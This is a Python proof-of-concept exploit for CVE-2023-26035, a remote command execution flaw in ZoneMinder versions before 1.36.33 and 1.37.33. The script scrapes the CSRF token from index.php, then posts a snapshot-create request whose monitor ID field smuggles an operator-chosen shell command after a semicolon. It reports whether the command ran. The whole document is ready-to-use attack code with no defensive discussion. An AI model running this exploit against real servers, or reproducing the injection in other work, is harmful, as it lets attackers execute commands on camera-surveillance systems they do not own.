ZoneMinder RCE - CVE-2023-26035

CVE-2023-26035.py

# Author: https://github.com/Splinter0
# ZoneMinder RCE - CVE-2023-26035 
# Affects: <1.36.33,1.37.33
# https://nvd.nist.gov/vuln/detail/CVE-2023-26035 

import re
import sys
import requests

def getCsrfToken(target: str) -> str:
    r = requests.get(
        f"{target}/index.php"
    )

    if r.status_code != 200:
        print("[-] Could not fetch CSRF token!")
        exit(1)
    
    m = re.findall("key:[a-f0-9]{40},\d+", r.text)
    if len(m) == 0:
        print("[-] Could not extract CSRF token!")
        exit(1)
    
    token = m[0]
    print(f"[+] Found CSRF token: {token}")
    
    return token

def sendCommand(target: str, cmd: str, csrfToken: str):
    r = requests.post(
        f"{target}/index.php",
        data={
            "view": "snapshot",
            "action": "create",
            "monitor_ids[0][Id]": f";{cmd}",
            "__csrf_magic": csrfToken
        }
    )

    if r.status_code != 200:
        print("[-] Could not run command!")
        exit(1)
    
    print("[+] Ran command successfully")


def exploit(target: str, cmd: str):
    token = getCsrfToken(target)
    sendCommand(target, cmd, token)

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python3 CVE-2023-26035.py <url> <cmd>")
        exit(1)
    
    target = sys.argv[1]
    cmd = sys.argv[2]
    
    exploit(target, cmd)